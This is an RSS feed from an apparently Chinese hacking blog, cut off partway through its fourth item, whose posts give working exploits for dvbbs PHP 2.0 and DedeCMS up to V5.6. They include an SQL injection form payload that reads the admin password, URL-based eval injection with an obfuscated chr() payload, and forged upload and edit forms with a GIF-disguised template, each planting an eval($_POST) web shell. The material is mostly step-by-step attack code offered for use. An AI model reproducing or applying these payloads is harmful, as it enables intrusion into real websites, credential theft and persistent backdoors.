<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[GuLang's Blog - 漏洞相关]]></title>
<link>http://www.0354hk.com/</link>
<description><![CDATA[创造机会的人是勇者；等待机会的人是愚者]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[chenliangsx@gmail.com(孤_狼)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>GuLang&#39;s Blog</title>
	<url>http://www.0354hk.com/images/logos.gif</url>
	<link>http://www.0354hk.com/</link>
	<description>GuLang&#39;s Blog</description>
</image>

			<item>
			<link>http://www.0354hk.com/article.asp?id=484</link>
			<title><![CDATA[dvbbs php2.0 joinvipgroup.php注入0day]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Thu,02 Sep 2010 22:13:41 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=484</guid>
		<description><![CDATA[1,joinvipgroup.php&nbsp;&nbsp;//注入<br/><br/>代码解析<br/><br/>Code:<br/>function up_vipuser(){<br/>global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser;<br/>$groupid=$_POST[&#39;&#39;vipgroupid&#39;&#39;];<br/>$btype=$_POST[&#39;&#39;Btype&#39;&#39;];<br/>$vipmoney=$_POST[&#39;&#39;vipmoney&#39;&#39;];<br/>$vipticket=$_POST[&#39;&#39;vipticket&#39;&#39;];<br/>if($groupid==0 o&#114; $vipmoney&lt;0 o&#114; $vipticket&lt;0){echo &#34;@@&#34;;<br/>&nbsp;&nbsp; showmsg($lang[&#39;&#39;join.info4&#39;&#39;]);<br/>&nbsp;&nbsp; exit;<br/>}<br/>$issql=$db-&gt;scalar(&#34;Sel&#101;ct count(1) FROM {$dv}usergroups Wh&#101;re parentgid=5 and usergroupid=&#39;&#39;&#34;.intval($groupid).&#34;&#39;&#39;&#34;);echo $issql;<br/>if($issql&gt;0 AND ($sql=$db-&gt;query(&#34;Sel&#101;ct usergroupid,title,usertitle,groupsetting,grouppic FROM {$dv}usergroups Wh&#101;re parentgid=5 and usergroupid=&#39;&#39;&#34;.intval($groupid).&#34;&#39;&#39;&#34;))){<br/>&nbsp;&nbsp; while ($arr=$db-&gt;fetch_array($sql)){<br/>&nbsp;&nbsp;&nbsp;&nbsp;$vipgroupsetting=explode(&#34;,&#34;,$arr[&#39;&#39;groupsetting&#39;&#39;]);<br/>&nbsp;&nbsp;&nbsp;&nbsp;$upsetting=explode($lang[&#39;&#39;join.separator1&#39;&#39;], $vipgroupsetting[71]);//&#39;&#39;升级到该组所需金币数 金币数§点券数§有效天数§最低天数<br/>&nbsp;&nbsp;&nbsp;&nbsp;if($btype==1){echo &#34;???&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp; $vipmoney=0;<br/>&nbsp;&nbsp;&nbsp;&nbsp; if(intval($upsetting[3])&gt;0){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$mustnum=$upsetting[3]*$upsetting[1]/$upsetting[2];<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($mustnum&gt;0){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $mustnum=number_format($mustnum,0);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}else{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; showmsg($lang[&#39;&#39;join.info5&#39;&#39;]);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; exit;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp; }<br/>&nbsp;&nbsp;&nbsp;&nbsp; if($userinfo[&#39;&#39;userticket&#39;&#39;]&lt;$vipticket o&#114; $vipticket&lt;$mustnum){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;showmsg($lang[&#39;&#39;join.info6&#39;&#39;]);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit;<br/>&nbsp;&nbsp;&nbsp;&nbsp; }<br/>&nbsp;&nbsp;&nbsp;&nbsp; $updats=$vipticket*$upsetting[2]/$upsetting[1];<br/>&nbsp;&nbsp;&nbsp;&nbsp; $updats=intval(number_format($updats,0));<br/>&nbsp;&nbsp;&nbsp;&nbsp;}else{echo &#34;&amp;&amp;&amp;&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp; $vipticket=0;<br/>&nbsp;&nbsp;&nbsp;&nbsp; if($upsetting[3]&gt;0){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$mustnum=$upsetting[3]*$upsetting[0]/$upsetting[2];<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($mustnum&gt;0){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $mustnum=number_format($mustnum,0);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}else{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; showmsg($lang[&#39;&#39;join.info5&#39;&#39;]);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; exit;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp; }<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var_dump($userinfo[&#39;&#39;usermoney&#39;&#39;]&lt;$vipmoney);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var_dump($vipmoney&lt;$mustnum);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp; if($userinfo[&#39;&#39;usermoney&#39;&#39;]&lt;$vipmoney || $vipmoney&lt;$mustnum){echo &#34;ri&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;showmsg($lang[&#39;&#39;join.info7&#39;&#39;]);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit;<br/>&nbsp;&nbsp;&nbsp;&nbsp; }<br/>&nbsp;&nbsp;&nbsp;&nbsp; $updats=$vipmoney*$upsetting[2]/$upsetting[0];<br/>&nbsp;&nbsp;&nbsp;&nbsp; $updats=intval(number_format($updats,0));<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;if($vipgroupuser===true){echo &#34;%%%&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp; $db-&gt;query(&#34;Up&#100;ate {$dv}user SET usergroupid=&#34;.$groupid.&#34;,userclass=&#39;&#39;&#34;.$arr[&#39;&#39;usertitle&#39;&#39;].&#34;&#39;&#39;,titlepic=&#39;&#39;&#34;.$arr[&#39;&#39;grouppic&#39;&#39;].&#34;&#39;&#39;,usermoney=usermoney-&#34;.$vipmoney.&#34;,userticket=userticket-&#34;.$vipticket.&#34;,vip_endtime=&#39;&#39;&#34;.($userinfo[&#39;&#39;vip_endtime&#39;&#39;]+$up&#100;ates*24*3600).&#34;&#39;&#39; Wh&#101;re userid=&#34;.$userid.&#34;&#34;);<br/>&nbsp;&nbsp;&nbsp;&nbsp; $db-&gt;query(&#34;Up&#100;ate {$dv}online SET usergroupid=&#39;&#39;$groupid&#39;&#39; Wh&#101;re userid=$userid&#34;);<br/>&nbsp;&nbsp;&nbsp;&nbsp;}else{echo &#34;^^^&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp; $db-&gt;query(&#34;Up&#100;ate {$dv}user SET usergroupid=&#34;.$groupid.&#34;,userclass=&#39;&#39;&#34;.$arr[&#39;&#39;usertitle&#39;&#39;].&#34;&#39;&#39;,titlepic=&#39;&#39;&#34;.$arr[&#39;&#39;grouppic&#39;&#39;].&#34;&#39;&#39;,usermoney=usermoney-&#34;.$vipmoney.&#34;,userticket=userticket-&#34;.$vipticket.&#34;,vip_endtime=&#39;&#39;&#34;.(TIME_NOW+$up&#100;ates*24*3600).&#34;&#39;&#39;,vip_startime=&#39;&#39;&#34;.TIME_NOW.&#34;&#39;&#39; Wh&#101;re userid=&#34;.$userid.&#34;&#34;);<br/>&nbsp;&nbsp;&nbsp;&nbsp; $db-&gt;query(&#34;Up&#100;ate {$dv}online SET usergroupid=&#39;&#39;$groupid&#39;&#39; Wh&#101;re userid=$userid&#34;);<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;..............................................................<br/>&nbsp;&nbsp; $vipmoney变量没有过滤，利用前提是管理员设了vip会员组,有点金币:)<br/>&lt;title&gt;test&lt;/title&gt;&lt;form name=&#34;p_form&#34; id=&#34;p_form&#34; method=&#34;post&#34; action=&#34;<a href="http://127.1/dvbbs/joinvipgroup.php?action=upvipuser" target="_blank" rel="external">http://127.1/dvbbs/joinvipgroup.php?action=upvipuser</a>&#34; enctype=&#34;multipart/form-data&#34;&gt;<br/>&lt;input id=&#39;&#39;img_thumb_final&#39;&#39; name=&#39;&#39;vipmoney&#39;&#39; type=&#34;text&#34; value=&#34;0,useremail=123456&#34;&gt;<br/>&lt;input id=&#39;&#39;img_thumb_final&#39;&#39; name=&#39;&#39;vipticket&#39;&#39; type=&#34;text&#34; value=&#34;88&#34;&gt;<br/>&lt;input id=&#39;&#39;img_thumb_final&#39;&#39; name=&#39;&#39;vipgroupid&#39;&#39; type=&#34;text&#34; value=&#34;25&#34;&gt;<br/>&lt;input id=&#39;&#39;img_thumb_final&#39;&#39; name=&#39;&#39;Btype&#39;&#39; type=&#34;text&#34; value=&#34;&#34;&gt;<br/>&lt;input name=&#34;sub&#34; type=&#34;submit&#34; value=&#34;提交&#34; /&gt;<br/>&lt;/form&gt;<br/>&lt;!------------<br/>0,userface=(sel&#101;ct password from dv_admin wh&#101;re id=1) wh&#101;re userid=1#<br/>!&gt;<br/>&nbsp;&nbsp; <br/><br/>2,cache/static/index_0_0.php //执行漏洞<br/>index.php<br/><br/>代码解析<br/><br/>Code:<br/>if((!$useindexstatic) || (!$useindexstatic_css) || $page&gt;1 || $topicmode&gt;0){<br/>&nbsp;&nbsp; ....................................<br/>if($useindexstatic_css &amp;&amp; $page &lt; 2 &amp;&amp; $topicmode==0){<br/>&nbsp;&nbsp; $this_my_f= ob_get_contents(); //生成缓存文件<br/>&nbsp;&nbsp; ob_end_clean();<br/>&nbsp;&nbsp; to_static_php_file($indexstatic,$this_my_f);<br/>}<br/>&nbsp;&nbsp; ...................................<br/>}<br/><br/>写缓存生成的文件里有eval(),但文件顶部没有限制返问<br/>&lt;? eval(“\$lang[&#39;&#39;tpl.str10&#39;&#39;]=\”{$lang[&#39;&#39;tpl.str10&#39;&#39;]}\”;”);?&gt;<br/><br/>index_0_0.php?lang[tpl.str10]={${phpinfo()}}<br/><br/>3,templates/default/index.tpl.php //执行漏洞<br/><br/>代码解析<br/><br/>Code:<br/>&lt;?<br/>if( !defined(&#39;&#39;ISDVBBS&#39;&#39;) ){<br/>header(&#39;&#39;HTTP/1.0 404 Not Found&#39;&#39;);<br/>exit;<br/>}<br/>global $imgurl;<br/>if($useindexstatic)<br/>&nbsp;&nbsp; echo &#39;&#39;&lt;? eval(&#34;\$lang[\&#39;&#39;tpl.str10\&#39;&#39;]=\&#34;{$lang[\&#39;&#39;tpl.str10\&#39;&#39;]}\&#34;;&#34;);?&gt;&#39;&#39;;<br/>else<br/>&nbsp;&nbsp; eval(&#34;\$lang[&#39;&#39;tpl.str10&#39;&#39;]=\&#34;{$lang[&#39;&#39;tpl.str10&#39;&#39;]}\&#34;;&#34;);<br/>?&gt;<br/><br/>…………………….<br/>index.php<br/><br/>代码解析<br/><br/>Code:<br/>&nbsp;&nbsp; ...........//省略部份代码<br/>if((!$useindexstatic) || (!$useindexstatic_css) || $page&gt;1 || $topicmode&gt;0){<br/>if($useindexstatic_css &amp;&amp;$page &lt; 2 &amp;&amp; $topicmode==0){<br/>&nbsp;&nbsp; $useindexstatic= true;<br/>&nbsp;&nbsp; ob_start();<br/>}<br/>else<br/>&nbsp;&nbsp; $useindexstatic= false;<br/>include_once INC_PATH.&#39;&#39;DV_Encoding.class.php&#39;&#39;;<br/>$objenc =&amp; DV_Encoding::GetEncoding($charset);<br/>$lang = load_lang($lang, &#39;&#39;index&#39;&#39; );<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;....................<br/><br/>首页调用模板，但没初始化$lang变量,只要满足if($useindexstatic_css &amp;&amp;$page &lt; 2 &amp;&amp; $topicmode==0)条件就能成功<br/>例:<br/><br/>代码解析<br/><br/>Code:<br/><a href="http://www.sitedir.com.cn/bbs/index.php?lang" target="_blank" rel="external">http://www.sitedir.com.cn/bbs/index.php?lang</a>[tpl.str10]={${phpinfo()}}<br/>&nbsp;&nbsp; index.php?lang[tpl.str10]={${phpinfo()}}<br/><br/>代码解析<br/><br/>Code:<br/>&nbsp;&nbsp; index.php?lang[tpl.str10]={${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(32).chr(62).chr(39).chr(41).chr(59))}}&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fputs(fopen(&#39;&#39;x.php&#39;&#39;,&#39;&#39;w+&#39;&#39;),&#39;&#39;&lt;?eval($_POST[c])?&gt;&#39;&#39;);<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=483</link>
			<title><![CDATA[DEDECMS网站管理系统Get Shell漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Thu,02 Sep 2010 22:13:00 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=483</guid>
		<description><![CDATA[Gif89a{dede:field name=&#39;&#39;toby57&#39;&#39; runphp=&#39;&#39;yes&#39;&#39;}<br/>phpinfo();<br/>{/dede:field}<br/>保存为1.gif<br/><br/>&nbsp;&nbsp; 1.&nbsp;&nbsp;&lt;form action=&#34;<a href="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" target="_blank" rel="external">http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php</a>&#34; method=&#34;post&#34; enctype=&#34;multipart/form-data&#34; &#34;&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 2. &lt;input type=&#34;hidden&#34; name=&#34;aid&#34; value=&#34;7&#34; /&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 3. &lt;input type=&#34;hidden&#34; name=&#34;mediatype&#34; value=&#34;1&#34; /&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 4. &lt;input type=&#34;text&#34; name=&#34;oldurl&#34; value=&#34;/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif&#34; /&gt;&lt;/br&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 5. &lt;input type=&#34;hidden&#34; name=&#34;dopost&#34; value=&#34;save&#34; /&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 6. &lt;input name=&#34;title&#34; type=&#34;hidden&#34; id=&#34;title&#34; value=&#34;1.jpg&#34; class=&#34;intxt&#34;/&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 7. &lt;input name=&#34;addonfile&#34; type=&#34;file&#34; id=&#34;addonfile&#34;/&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 8. &lt;button class=&#34;button2&#34; type=&#34;submit&#34; &gt;更改&lt;/button&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 9. &lt;/form&gt;&nbsp;&nbsp;<br/><br/>构造如上表单，上传后图片保存为/uploads/userup/3/1.gif<br/>发表文章，然后构造修改表单如下：<br/> <br/> <br/><br/>&nbsp;&nbsp; 1. &lt;form&nbsp;&nbsp;action=&#34;<a href="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" target="_blank" rel="external">http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php</a>&#34; method=&#34;post&#34; enctype=&#34;multipart/form-data&#34;&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 2. &lt;input type=&#34;hidden&#34; name=&#34;dopost&#34; value=&#34;save&#34; /&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 3. &lt;input type=&#34;hidden&#34; name=&#34;aid&#34; value=&#34;2&#34; /&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 4. &lt;input type=&#34;hidden&#34; name=&#34;idhash&#34; value=&#34;ec66030e619328a6c5115b55483e8dbd&#34; /&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 5. &lt;input type=&#34;hidden&#34; name=&#34;channelid&#34; value=&#34;1&#34; /&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 6. &lt;input type=&#34;hidden&#34; name=&#34;oldlitpic&#34; value=&#34;&#34; /&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 7. &lt;input type=&#34;hidden&#34; name=&#34;sortrank&#34; value=&#34;1282049150&#34; /&gt;&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp; 8. &lt;input&nbsp;&nbsp;name=&#34;title&#34; type=&#34;text&#34; id=&#34;title&#34; value=&#34;aaaaaaaaaaaaaaa&#34; maxlength=&#34;100&#34; class=&#34;intxt&#34;/&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp; 9. &lt;input type=&#34;text&#34; name=&#34;writer&#34; id=&#34;writer&#34; value=&#34;123456&#34; maxlength=&#34;100&#34; class=&#34;intxt&#34; style=&#34;width:219px&#34;/&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;10. &lt;sel&#101;ct name=&#39;&#39;typeid&#39;&#39; size=&#39;&#39;1&#39;&#39;&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;11. &lt;option value=&#39;&#39;1&#39;&#39; class=&#39;&#39;option3&#39;&#39; sel&#101;cted=&#39;&#39;&#39;&#39;&gt;Test&lt;/option&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;12. &lt;sel&#101;ct name=&#39;&#39;mtypesid&#39;&#39; size=&#39;&#39;1&#39;&#39;&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;13. &lt;option value=&#39;&#39;0&#39;&#39; sel&#101;cted&gt;请选择分类...&lt;/option&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;14. &lt;option value=&#39;&#39;1&#39;&#39; class=&#39;&#39;option3&#39;&#39; sel&#101;cted&gt;aa&lt;/option&gt;&lt;/sel&#101;ct&gt;&nbsp;&nbsp; <br/>&nbsp;&nbsp;15. &lt;textarea name=&#34;description&#34; id=&#34;description&#34;&gt;aaaaaaaaaaaaa&lt;/textarea&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;16. &lt;input type=&#39;&#39;hidden&#39;&#39; name=&#39;&#39;dede_addonfields&#39;&#39; value=&#34;templet&#34;&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;17. &lt;input type=&#39;&#39;hidden&#39;&#39; name=&#39;&#39;templet&#39;&#39; value=&#34;../uploads/userup/3/1.gif&#34;&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;18. &lt;input type=&#34;hidden&#34; id=&#34;body&#34; name=&#34;body&#34; value=&#34;aaaa&#34; style=&#34;display:none&#34; /&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;19. &lt;button class=&#34;button2&#34; type=&#34;submit&#34;&gt;提交&lt;/button&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;20. &lt;/form&gt; <br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=482</link>
			<title><![CDATA[Dedecms <= V5.6 Final模板执行漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Thu,02 Sep 2010 22:11:26 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=482</guid>
		<description><![CDATA[1.上传一个模板文件：注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：uploads/userup/2/12OMX04-15A.jpg模板内容是（如果限制图片格式，加gif89a）：{dede:name runphp=&#39;&#39;yes&#39;&#39;}$fp = @fopen(&#34;1.php&#34;, &#39;&#39;a&#39;&#39;);@fwrite($fp, &#39;&#39;&lt;&#39;&#39;.&#39;&#39;?php&#39;&#39;.&#34;\r\n\r\n&#34;.&#39;&#39;eval($_POST[cmd])&#39;&#39;.&#34;\r\n\r\n?&#34;.&#34;&gt;\r\n&#34;);@fclose($fp);{/dede:name}2.修改刚刚发表的文章，查看源文件，构造一个表单：&lt;form class=&#34;mTB10 mL10 mR10&#34; name=&#34;addcontent&#34; id=&#34;addcontent&#34; action=&#34;<a href="http://127.0.0.1/dede/member/article_edit.php" target="_blank" rel="external">http://127.0.0.1/dede/member/article_edit.php</a>&#34; method=&#34;post&#34; enctype=&#34;multipart/form-data&#34; onsubmit=&#34;return checkSubmit();&#34;&gt;&lt;input type=&#34;hidden&#34; name=&#34;dopost&#34; value=&#34;save&#34; /&gt;&lt;input type=&#34;hidden&#34; name=&#34;aid&#34; value=&#34;2&#34; /&gt;&lt;input type=&#34;hidden&#34; name=&#34;idhash&#34; value=&#34;f5f682c8d76f74e810f268fbc97ddf86&#34; /&gt;&lt;input type=&#34;hidden&#34; name=&#34;channelid&#34; value=&#34;1&#34; /&gt;&lt;input type=&#34;hidden&#34; name=&#34;oldlitpic&#34; value=&#34;&#34; /&gt;&lt;input type=&#34;hidden&#34; name=&#34;sortrank&#34; value=&#34;1275972263&#34; /&gt;&lt;div id=&#34;mainCp&#34;&gt;&lt;h3 class=&#34;meTitle&#34;&gt;&lt;strong&gt;修改文章&lt;/strong&gt;&lt;/h3&gt;&lt;div class=&#34;postForm&#34;&gt;&lt;label&gt;标题：&lt;/label&gt;&lt;input&nbsp;&nbsp;name=&#34;title&#34; type=&#34;text&#34; id=&#34;title&#34; value=&#34;11233ewsad&#34; maxlength=&#34;100&#34; class=&#34;intxt&#34;/&gt;&lt;label&gt;标签TAG：&lt;/label&gt;&lt;input name=&#34;tags&#34; type=&#34;text&#34; id=&#34;tags&#34;&nbsp;&nbsp;value=&#34;hahah,test&#34; maxlength=&#34;100&#34; class=&#34;intxt&#34;/&gt;(用逗号分开)&lt;label&gt;作者：&lt;/label&gt;&lt;input type=&#34;text&#34; name=&#34;writer&#34; id=&#34;writer&#34; value=&#34;test&#34; maxlength=&#34;100&#34; class=&#34;intxt&#34; style=&#34;width:219px&#34;/&gt;&lt;label&gt;隶属栏目：&lt;/label&gt;&lt;sel&#101;ct name=&#39;&#39;typeid&#39;&#39; size=&#39;&#39;1&#39;&#39;&gt;&lt;option value=&#39;&#39;1&#39;&#39; class=&#39;&#39;option3&#39;&#39; sel&#101;cted=&#39;&#39;&#39;&#39;&gt;测试栏目&lt;/option&gt;&lt;/sel&#101;ct&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;span style=&#34;color:#F00&#34;&gt;*&lt;/span&gt;(不能选择带颜色的分类)&lt;label&gt;我的分类：&lt;/label&gt;&lt;sel&#101;ct name=&#39;&#39;mtypesid&#39;&#39; size=&#39;&#39;1&#39;&#39;&gt;&lt;option value=&#39;&#39;0&#39;&#39; sel&#101;cted&gt;请选择分类...&lt;/option&gt;&lt;option value=&#39;&#39;1&#39;&#39; class=&#39;&#39;option3&#39;&#39; sel&#101;cted&gt;hahahha&lt;/option&gt;&lt;/sel&#101;ct&gt;&lt;label&gt;信息摘要：&lt;/label&gt;&lt;textarea name=&#34;description&#34; id=&#34;description&#34;&gt;1111111&lt;/textarea&gt;(内容的简要说明)&lt;label&gt;缩略图：&lt;/label&gt;&lt;input name=&#34;litpic&#34; type=&#34;file&#34; id=&#34;litpic&#34; onchange=&#34;SeePicNew(&#39;&#39;divpicview&#39;&#39;,this);&#34;&nbsp;&nbsp;maxlength=&#34;100&#34; class=&#34;intxt&#34;/&gt;&lt;input type=&#39;&#39;text&#39;&#39; name=&#39;&#39;templet&#39;&#39;value=&#34;../ uploads/userup/2/12OMX04-15A.jpg&#34;&gt;&lt;input type=&#39;&#39;text&#39;&#39; name=&#39;&#39;dede_addonfields&#39;&#39;value=&#34;templet,htmltext;&#34;&gt;（这里构造）&lt;/div&gt;&lt;!-- 表单操作区域 --&gt;&lt;h3 class=&#34;meTitle&#34;&gt;详细内容&lt;/h3&gt;&lt;div class=&#34;contentShow postForm&#34;&gt;&lt;input type=&#34;hidden&#34; id=&#34;body&#34; name=&#34;body&#34; value=&#34;&amp;lt;div&amp;gt;&amp;lt;a href=&amp;quot;<a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank" rel="external">http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg</a>&amp;quot; target=&amp;quot;_blank&amp;quot;&amp;gt;&amp;lt;img border=&amp;quot;0&amp;quot; alt=&amp;quot;&amp;quot; src=&amp;quot;<a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank" rel="external">http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg</a>&amp;quot; width=&amp;quot;1010&amp;quot; height=&amp;quot;456&amp;quot; /&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt; &amp;lt;p&amp;gt;&amp;amp;lt;?phpinfo()?&amp;amp;gt;1111111&amp;lt;/p&amp;gt;&#34; style=&#34;display:none&#34; /&gt;&lt;input type=&#34;hidden&#34; id=&#34;body___Config&#34; value=&#34;FullPage=false&#34; style=&#34;display:none&#34; /&gt;&lt;iframe id=&#34;body___Frame&#34; src=&#34;/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&amp;amp;Toolbar=Member&#34; width=&#34;100%&#34; height=&#34;350&#34; frameborder=&#34;0&#34; scrolling=&#34;no&#34;&gt;&lt;/iframe&gt;&lt;label&gt;验证码：&lt;/label&gt;&lt;input name=&#34;vdcode&#34; type=&#34;text&#34; id=&#34;vdcode&#34; maxlength=&#34;100&#34; class=&#34;intxt&#34; style=&#39;&#39;width:50px;text-transform:uppercase;&#39;&#39; /&gt;&lt;img src=&#34;<a href="http://127.0.0.1" target="_blank" rel="external">http://127.0.0.1</a> /dede/include/vdimgck.php&#34; alt=&#34;看不清？点击更换&#34; align=&#34;absmiddle&#34; style=&#34;cursor:pointer&#34; onclick=&#34;this.src=this.src+&#39;&#39;?&#39;&#39;&#34; /&gt;&lt;button class=&#34;button2&#34; type=&#34;submit&#34;&gt;提交&lt;/button&gt;&lt;button class=&#34;button2 ml10&#34; type=&#34;reset&#34; onclick=&#34;location.reload();&#34;&gt;重置&lt;/button&gt;&lt;/div&gt;&lt;/div&gt;&lt;/form&gt;提交，提示修改成功，则我们已经成功修改模板路径。3.访问修改的文章：假设刚刚修改的文章的aid为2，则我们只需要访问：<a href="http://127.0.0.1/dede/plus/view.php?aid=2" target="_blank" rel="external">http://127.0.0.1/dede/plus/view.php?aid=2</a>即可以在plus目录下生成webshell：1.php<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=481</link>
			<title><![CDATA[KingCMS ASP 5.0/5.1 Fck编程器上传漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Thu,02 Sep 2010 22:09:30 +0800</pubDate>
